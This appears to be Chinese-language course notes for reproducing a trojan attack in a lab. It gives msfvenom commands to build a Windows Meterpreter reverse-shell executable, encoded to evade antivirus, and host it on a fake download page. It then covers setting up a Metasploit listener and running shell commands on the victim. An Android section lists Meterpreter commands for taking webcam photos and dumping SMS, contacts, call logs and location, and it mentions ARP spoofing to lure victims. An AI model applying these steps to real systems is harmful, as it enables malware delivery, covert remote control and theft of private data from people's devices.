攻击复现
1. 生成病毒
参数解释
1. -p payload
攻击所用的 payload ,这里使用 windows/meterpreter/reverse_tcp ,获取反弹
shell 。
2. lhost local host
攻击方 IP 地址。
3. lport local port
攻击方端口,这个端口与 msfconsole 中监听的要一致。
4. -e encoders
将程序进行编码,以绕过杀毒软件的检测,这里我们使用 x86/alpha_mixed 。
5. -i iterator times
迭代的次数,因为每次编码是对上一次编码的内容再次进行编码,在计算机领域这种操作叫
做“迭代(iterator)”,因此参数是 i .
迭代的过程中程序的体积会越来越大,因此要适当控制迭代次数。
6. -f file type
msfvenom -p windows/meterpreter/reverse_tcp lhost=[本地 IP] lport=[监听端口] -e [编
码方式] -i [编码次数] -f [格式] >[木马程序文件名]
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.124 lport=8848 -e
x86/alpha_mixed -i 1 -f exe >/home/yijin/fake-page/static/evil.exe
这里我们是要生成 Windows 可执行程序,因此格式为 exe 。
7. > 写入文件
我们将在 /home/yijin/fake-page/ 下跑一个网页服务,并诱导靶机从这里下载木马,因此
放在这个目录下。
2. 启动网页
网页内容已经放在了 /home/yijin/fake-page/ 目录,在这里执行 node server.js 启动服务。
3. 开启端口监听
1. msfconsole 进入 metasploit 控制台;
2. use exploit/multi/handler 使用“多面手”模块;
3. set payload windows/meterpreter/reverse_tcp 设置 payload;
4. set LHOST [IP] 设置本地IP(攻击机 IP);
5. set LPORT [PORT] 设置本地监听端口;
6. run 开始监听。
4. 靶机下载并运行木马
如无意外,在 msfconsole 输入 shell 即可拿到 shell;
whoami 查看自己身份;
可以通过关机来展示攻击成果。
5. 可演示操作
whoami 账号名称
ver 版本信息
winver windows 版本信息
hostname 主机名
ipconfig IP 地址
call xx.bat
mshta javascript:confirm("Hello world!");window.close() 弹窗问候
strat iexplore "ke.yijincc.com"
time /t 显示当前时间
安卓木马
复现步骤
老师:由于时间的关系,我们这里还是把生成的木马程序放到那个网站下,但是由于时间关系,我们就
不去改网站源码了,直接访问它的一个下载地址就行。
1. 打开模拟器,运行一个安卓系统
2. msfvenom 生成木马
3. msfconsole 开始监听
1. msfconsole 进入 metasploit 控制台;
2. set payload windows/meterpreter/reverse_tcp 设置 payload;
3. set LHOST [IP] 设置本地IP(攻击机 IP);
4. set LPORT [PORT] 设置本地监听端口;
5. run 开始监听。
4. 靶机下载、并运行木马
靶机访问攻击机页面(这里可以结合 ARP 欺骗,也可以直接访问 IP),并下载木马,运行。
!注意,这里不用输入 shell;
whoami 查看自己身份;
安卓命令
1. check_root 检查是否已经 root;
2. sysinfo 查看系统信息;
3. webcam_list 枚举摄像头;
4. webcam_snap -i [CAM INDEX] 使用指定的摄像头拍照;
5. webcam_stream 从指定的摄像头播放视频流;
6. 图片文件搜索;
7. 下载文件;
8. dump_sms 获取短信;
9. dump_contacts 下载通讯录;
10. geolocate 查看定位,但是需要安装谷歌地图;
11. dump_calllog 下载通话记录;